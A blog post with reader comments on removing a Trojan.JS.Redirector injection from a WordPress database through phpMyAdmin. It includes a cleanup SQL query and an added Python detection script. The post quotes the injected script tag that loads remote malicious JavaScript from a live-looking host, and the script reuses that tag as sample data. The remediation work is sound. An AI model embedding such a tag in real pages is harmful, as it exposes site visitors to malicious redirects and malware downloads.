Neutralizing a Trojan.JS.Redirector.cq SQL injection on your WordPress blog
29 Jul
Early today, a friend, Calvin Chew, tweeted me about an antivirus alert on my site. I immediately looked into it and did some research on the internet.
It turned out that a line of code loading a remote malicious JavaScript file had been inserted into each of my five-hundred-something pages and posts through an SQL injection attack. The script redirects visitors to a rogue antivirus page that downloads a rootkit onto the local system upon any click, even one meant to close the window. This JavaScript trojan is said to mostly affect MediaTemple-hosted WordPress blogs.
I managed to clear the database in less than an hour, while on the phone. If your blog has been compromised, read on to find out how.
It helps to know as many details of the injection as possible. For example, Kaspersky Internet Security will report the threat name and the URL it loads. This saves time and speeds up the clean-up.
Step 1:
Change your database user password. On MediaTemple, you can log into the (mt) AccountCenter, then navigate to your server controls and click on “Manage Databases”. Update your password under the “Global Settings” tab.
Step 2:
Log into phpMyAdmin. The “Admin” buttons in “Databases List” will lead you there.
Step 3:
On the left-hand sidebar, click on the database of your blog which has been compromised.
Step 4:
It is wise to back up your database first, just in case anything goes wrong.
Step 5:
Run a search for </script> across all tables of the database. This returns every row that contains JavaScript (including legitimate scripts you added yourself). Browse to a row containing code you do not remember adding and identify the remote URL of the offending script. Copy the entire line of code which, in my case, was <script src="http://ao.euuaw.com/9"></script> (warning: don’t visit the URL!).
Step 6:
Now return to the main page of your database and click on the “SQL” tab at the top. Enter the following query:
UPDATE wp_posts SET post_content = replace(post_content,'<script src="http://ao.euuaw.com/9"></script>','');
Here’s what it does: the first part says “access the ‘wp_posts’ table”, and the second says “look into the ‘post_content’ field”. By default, your table names begin with “wp_”; if you chose a different table prefix during installation, use that instead. The replace() function then does a search-and-replace in the ‘post_content’ field of every row, searching for the JavaScript code (change it to the code you copied earlier) and replacing it with an empty string, which deletes it. The match is literal, so the string must be copied exactly as it appears in the table.
Step 7:
Once that is done, your database table should be clear of the injection. Now update your blog’s wp-config.php file with the new database password. From an antimalware-protected system, check whether the malicious JavaScript still appears on your site.
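The Step 5 search and the Step 6 replace, done programmatically over rows exported from wp_posts, as an added example that is not part of the original post. Python is assumed; the sample rows and the allowed-host list are constructed, and the pattern only catches the simple <script src="..."></script> shape quoted above.

```python
# Added example (not code from the original post): the Step 5/Step 6
# search-and-replace done programmatically. It finds rows whose content
# loads a script from a host you did not add yourself, then strips that
# exact tag the way REPLACE(post_content, tag, '') does. Constructed data.
import re
from urllib.parse import urlparse

# Matches a <script ... src="..."></script> pair, capturing the src URL.
SCRIPT_RE = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>\s*</script>',
    re.IGNORECASE,
)
# Hosts whose scripts the site owner knowingly embedded (constructed).
ALLOWED_HOSTS = {"example.org", "www.example.org"}

def find_foreign_scripts(post_content, allowed_hosts=ALLOWED_HOSTS):
    """Return the full <script> tags whose src host is not allow-listed."""
    hits = []
    for m in SCRIPT_RE.finditer(post_content):
        host = (urlparse(m.group(1)).hostname or "").lower()
        if host not in allowed_hosts:
            hits.append(m.group(0))
    return hits

def strip_tags(post_content, tags):
    """Remove each tag verbatim, mirroring SQL REPLACE(post_content, tag, '')."""
    for tag in tags:
        post_content = post_content.replace(tag, "")
    return post_content

def triage(rows):
    """rows: (ID, post_content) pairs -> {ID: (cleaned, removed_tags)} for hits."""
    result = {}
    for post_id, content in rows:
        foreign = find_foreign_scripts(content)
        if foreign:
            result[post_id] = (strip_tags(content, foreign), foreign)
    return result

# Constructed wp_posts rows: a clean post, a legitimate embed, and the
# injected tag quoted in the post above.
SAMPLE_ROWS = [
    (1, "<p>Hello world.</p>"),
    (2, '<p>Chart</p><script src="https://www.example.org/chart.js"></script>'),
    (3, '<p>Post body</p><script src="http://ao.euuaw.com/9"></script>'),
]

if __name__ == "__main__":
    for post_id, (cleaned, removed) in triage(SAMPLE_ROWS).items():
        print(post_id, "removed", removed, "->", cleaned)
```

Feed it the ID and post_content columns exported from phpMyAdmin; the removed tags are the exact strings to put into the REPLACE() query, and the cleaned text is what that query will leave behind.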
The threat should be fully cleared from your WordPress blog by now. Just to be safe, you may check through your theme and plugin files for any traces of the threat.

So, just by deleting the URL, you are eliminating the possibility of future injections? SQL injections do not even need to know your DB password.
This tutorial shows how to remove an existing injection, not how to prevent a future one. I have not figured that out yet. The password change is just a precautionary measure.
Thanks for posting the tutorial … much appreciated!
I had this too!!!
I realized it at 6:30AM. I did the same steps before you were maybe even awake.
That didn’t completely solve the issue. After the fix I was getting errors, 500 errors, database not found errors and other badness.
What I did may have been drastic, I’m not sure.
After I changed the password and removed the DB stuff I did the following…
1) copy all plugins to a backup directory
2) re-installed wordpress fresh via FTP
3) restored from yesterday’s database backup
4) re-installed all plugins from the WordPress repository
WordPress 3
The reason for all the fresh files is because, I’m speculating, the malware inserted itself somewhere in JavaScript or PHP and was re-infecting or causing some other badness. My Apache log was showing errors, can’t remember exactly what, it’s the error you get when PHP is malformed.
SQL injections usually do not affect the WordPress files. Your case seems more like a WordPress trojan. If you can, check through your WordPress users in phpMyAdmin.
Otherwise, have a chat with your host to diagnose the issue.
Now I can see that exact same line on every post I try to edit…
It isn’t under any posts/pages yet, but it’s making me nervous to see this clearly lurking around.
Now I’ll try to figure out how to kick his a$$ before managing any post.
Thank you! Kept getting kicked out of phpMyadmin, but their support helped me out. Thank god.